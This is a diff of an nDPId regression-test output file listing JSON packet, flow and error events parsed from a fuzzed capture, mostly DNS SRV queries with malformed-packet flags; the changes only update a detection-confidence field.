+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470187658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470199678} 
00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470187658,"pkt":"ADBUADRWAODtAW69CABBAABIarMAAIARTJ7xqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470200673,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1120470200673,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470200673,"pkt":"ADBUADRWAODtAW69CABFAABIaqsAAIARTJ3AFgECwKgBAQrIADUANHAIufQBALQBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1120470202676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69CABFAABIarUAAIARTJzAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEZXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":47872,"global_ts_msec":1120470204679} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":47872,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69uwBFAABIarYAAIARTJvAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":307,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470207908} 
@@ -525,111 +525,111 @@ 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470208654} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"\/\/\/\/\/\/\/\/AODtAW69JXMAAABOargAAIARS5XAqAECwKgB\/wCJAIkAOlt+hZ0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOREJFSkVPQ0FDQUNBQ0GQQUJNAAAgAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1120470208684,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470208684,"pkt":"ADBUADRWAODtAW69CABFAABIarkAAIARTJjAqAECwKgBAQrIADUANHAIufQBAAABAAAAADYABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470015072,"flow_last_seen":1120470024079,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216686,"flow_last_seen":1120470216686,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1120470216686,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":17,"thread_ts_msec":1120470216686,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARTJrAqAECwKgBAQrJADUAMPj\/K\/YAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1120470216688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470216688,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CskAR9t7K\/aAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470216688,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470216688,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1120470216783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470216783,"pkt":"ADBUADRWAODtAW69CABFAABIar0AAIARTJTAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216783,"flow_last_seen":1120470216783,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470216783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1120470217778,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470217778,"pkt":"ADBUADRWAODtAW69CABFAABIar4AAIARTJPAqAECwKgBAQrKADUANKsCfvgBAABXAAAAAAAABF9zaXAEX3VkcANzaXAJY3m9ZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":315,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470216783,"flow_last_seen":1120470217778,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470217778,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1120470219780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CABFAABIar8AAIARTJLAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AnNrAAAhAAE="} 
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.sk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470221783} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":317,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW4lcwBFAABIasAAAIARTJHAqAECwKglcwDKADUANKsCfvgBAAABAAAAAAgABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470225789} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtAW69CACbAABIasEEAIARTJDAqAECwKgBAQrKADUANKsCfvgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470233791} 